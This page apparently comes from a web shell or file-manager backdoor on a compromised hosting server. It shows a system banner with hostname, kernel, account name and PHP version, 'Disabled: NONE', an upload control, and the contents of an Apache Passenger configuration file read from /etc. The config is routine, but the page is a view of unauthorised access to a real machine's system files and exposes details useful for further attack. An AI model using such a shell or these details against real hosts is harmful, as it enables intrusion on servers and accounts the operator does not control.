HEX
Server: LiteSpeed
System: Linux catuipe.dhs10.info 4.18.0-553.111.1.lve.el8.x86_64 #1 SMP Fri Mar 13 13:42:17 UTC 2026 x86_64
User: paradatacom (1125)
PHP: 8.1.34
Disabled: NONE
Upload Files
File: //etc/apache2/conf.d/passenger.conf
<IfModule mod_passenger.c>
PassengerBufferUpload off
   PassengerRoot /opt/cpanel/ea-ruby27/root/usr/share/passenger/phusion_passenger/locations.ini
   PassengerEnabled on
   # NOTE: Disabling this directive will allow users to
   # set Passenger directives in their .htaccess files.
   # This will allow them to bypass the 'MAXPASSENGERAPPS' limits
   # enforced by the "Application Manager" feature.
   # NOTE: This directive should be disabled if you are
   # using CloudLinux Ruby/Python/NodeJs selectors
   PassengerDisableHtaccess off
   PassengerDefaultRuby /opt/cpanel/ea-ruby27/root/usr/libexec/passenger-ruby27
   PassengerDisableSecurityUpdateCheck on
   PassengerInstanceRegistryDir /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg
</IfModule>